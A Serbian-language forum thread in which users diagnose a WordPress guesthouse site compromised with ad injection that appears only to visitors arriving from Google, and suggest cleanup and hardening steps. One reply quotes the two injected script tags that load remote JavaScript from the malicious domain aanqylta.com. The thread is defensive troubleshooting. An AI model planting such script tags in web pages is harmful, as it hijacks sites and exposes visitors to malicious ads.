[ erngab @ 21.02.2021. 16:52 ] @
Potrebna mi pomoć prijatelja 😀.
Imam problem sa jednim vebsajtom.
Žena u godinama izdaje sobe i zamolila me je da joj pregledam oglase. Ima svoj vebsajt za sobe koji ima problem.
Kada u google upišem “Vila Verona Palic” u listi se pojavi njen vebsajt (VilaVerona, Palić | Privatni smeštaj)
https://www.google.com/search?...p;sourceid=chrome&ie=UTF-8
Kada otvorim sajt iz google. Vebsajt je pun reklama, neupotrebljiv je, naročito za one koji prvi puta posećuju njenu stranicu (barem sam ja tako ustanovio)
Razgovarao sam sa mladićem (preko telefona) koji je pravio i koji održava njen vebsajt. On kaže da je kod njega sve u redu i da je problem u mom brovseru. Ja se ne slažem sa time pošto sam isprobao više računara (+ laptop, tablet, mobilni) greška se kod svih javlja kod prvog otvaranja.
Interesantna stvar je što na (http://) http://www.vilaverona.com/ vebsajt otvara bez reklama, sve je u redu. Međutim iz googlea otvara (https://) https://vilaverona.com/ i tu ima reklama (kasnijim otvaranjem ima kad ima ima kad nema - ali prvim otvaranjem iz googlea reklame su tu)
Sad mladić koji održava sajt kaže da uopšte sajt nije registrovan za https:// i da radi samo kao http://.
Od vas bih voleo zatražiti da ispitate i vi ovaj vebsajt, da ga otvorite sa drugih mesta. Da li samo ja nešto tu grešim ili se i kod drugih javlja ova greška.
Ako se i kod drugih javlja bilo bi dobro da neko kaže u čemu je problem, pa bih ovu temu prosledio moderatoru sajta.
Unapred hvala!
[ mjanjic @ 21.02.2021. 19:14 ] @
Meni iz Google otvara normalno http, ali ako dodam https, antivirus mi prijavi da je blokirao "https://aanqylta.com", imaš ovde opis: https://www.reddit.com/r/antiv...acom_what_is_this_website_and/

Kad na gornjem linku otvoriš Twitter link u jednom od komentara, prvi tweet kaže:
Citat:
Injection only when the referrer site is Google : really smart. The site administrator does not detect it easily as it has a shortcut to visit it and visible only on mobile (as blocked by numerous antivirus / adblocks). Client has been able ton find a solution, except backup?


Pominje se Malcare dodatak, da li stvarno radi ili ne, ne znam, treba probati, uglavnom preporučuje se i da promenite sve šifre...
[ BuzzLightyear @ 22.02.2021. 08:47 ] @
Izgleda da je problem rešen, ali mislim da bi trebalo i da ažurirate WP. Izgleda da koristite 4.8.15, a aktuelna verzija je 5.6.x.
Vidim i da je dozvoljen pristup http://vilaverona.com/xmlrpc.php. Ja bih to zabranio, pošto veliki broj napada ide preko xmlrpc.

Rekao bih da se koristi ova tema: https://themeforest.net/item/t...el-agency-altair-theme/9318575. Proveri da li je kupljena ili se koristi nulovana tema.
[ erngab @ 22.02.2021. 12:30 ] @
mjanjic - koji antivirus koristiš? Hoću i ja da isprobam.
BuzzLightyear - problem nije ni dalje rešen.
- Nisam još poslao ovu temu mladiću koji održava sajt. Očekivao sam da će više njih napisati da je i kod njih problem, da se prilikom otvaranja iz Googlea na sajtu pojavljuju reklame. Iz ova dva gornja komentara deluje da je problem zbog kojeg se ja žalim rešen ili da ga nema.
- Za smeštaj mi je bitno da je Google link ispravan. Ljudi koji dolaze iz pretrage, da redovno mogu otvoriti sadržaj sajta a ne sa reklamama.
- Sinoć sam probao otvoriti iz Google pretrage na jednom laptopu koji nije nikada otvarao link (prvo otvaranje). Otvorio se http:// ne https:// i on je bio sa reklamom. I danas imam problema sa reklamama. Kasnije čas ima reklame, čas nema (pratim sajt već više dana i ponaša se bez nekog pravila u vezi reklama)
- Dakle kod mene se reklame pojavljuju i na http:// i na https:// i to na različitim uređajima. Ne znam u čemu je problem (nisam baš toliko upućen u sve stvari koje ste napisali u gornjim komentarima - verovatno razume moderator sajta).
- Meni je bitno da dokažem da se problem javlja i kod drugih, da nisam jedini sa problemom iz Google otvaranja.
[ djoka_l @ 22.02.2021. 12:40 ] @
Ni meni se isto ne pokazuju reklame.
uBlock Origin blokira aanqylta.com

[ erngab @ 22.02.2021. 13:00 ] @
djoka_l hvala što si probao. Nemaju svi add-bloker, pogotovo ne na mobilnim uređajima. Dakle reklame postoje pošto add-bloker radi.
[ Deunan @ 22.02.2021. 13:03 ] @
Verovatno "SQL injection" kroz neki formular.

Ne prikazuje stalno reklame da ljudi koji su redovno na sajtu ne bi primetili da je hakovan. Kad si ulogovan kao admin verovatno nikad i ne prikazuje.

Mora da se nadje kod u bazi i da se izbrise. Prodji kroz sva polja u wordpress temi (custom js, footer adds, footer js, ...) probaj da nadjes kod koji je injectovan.

Ovo je ubacen kod:
Code:

<script type="text/javascript" src="//aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js"></script>
<script type="text/javascript" src="//aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js"></script>


[ mjanjic @ 22.02.2021. 14:26 ] @
Citat:
erngab:
mjanjic - koji antivirus koristiš? Hoću i ja da isprobam.

Eset Internet Security, mada bi svaki dobar AV trebao da ti to blokira.

Kao što su već naveli prethodni komentatori, u pitanju je ubačen kod koji prikazuje reklame, što znači da je iskorišćen neki propust u samom WP ili nekom od plaginova, manje je verovatno da je neko došao do šifre nekog od admin korisnika, ali nije zgoreg promeniti šifre i staviti neke jače, možete da koristite KeyPass ili neki sličan softver za pamćenje šifri, a da za admin i druge kritične naloge koristite što duže i složenije šifre.
[ Zlatni_bg @ 23.02.2021. 01:01 ] @
Iskreno, ako taj sto vam je pravio/odrzava sajt nema pojma u cemu je problem, i kaze da je sajt pravljen "za http a ne https", prvo promenite njega pa sredite sajt.

Bukvalno ako je tacno ovo sto ljudi pisu, WP penetration testing bi ga razvalio, a s obzirom da ima forme/admin deo jer je WP u pitanju, pitaj pre nego sto promenite tog lika da li zna sta se desi kada preko WiFi mreze submituje HTML formu preko HTTP.